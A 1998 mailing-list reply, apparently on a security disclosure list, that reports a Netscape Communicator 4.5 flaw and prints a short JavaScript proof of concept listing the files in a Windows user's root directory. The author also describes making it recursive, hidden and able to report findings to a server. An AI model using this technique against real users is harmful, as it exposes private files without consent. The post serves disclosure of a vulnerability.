Re: Netscape Communicator 4.5 can read local files

From: Terence Christopher Haddock (haddockat_private)
Date: Wed Nov 25 1998 - 12:28:45 PST

            This security hole is not limited to knowing a specific file name,
    it can be used to list the contents of a directory, which I believe is
    much more insidious. This script can send a list of the files in the
    user's root directory under windows:

    sl=window.open("wysiwyg://1/file://C|/");
    sl2=sl.window.open();
    sl2.location="javascript:"+
    "b=\"Here is the files in your root directory:\";"+
    "var f=new java.io.file(\"C:\\\\\");"+
    "var files=f.list();"+
    "for (var x=0;x<files.length;x++){"+
    "b+=files[x]+\"\n\""+
    "};"+
    "alert(b);";

            (Simple to modify it for UNIX)
            Using a search algorithm the script could search for specific
    files by running this recursively. The only problem (from a hacker's
    perspective, a good thing from our perspective) is all of the windows it
    would open. If a way could be worked around this (which I think it can),
    this script could run without a user even knowing it, searching the user's
    directories and reporting them to a server.

    Sincerely,
    Terence C. Haddock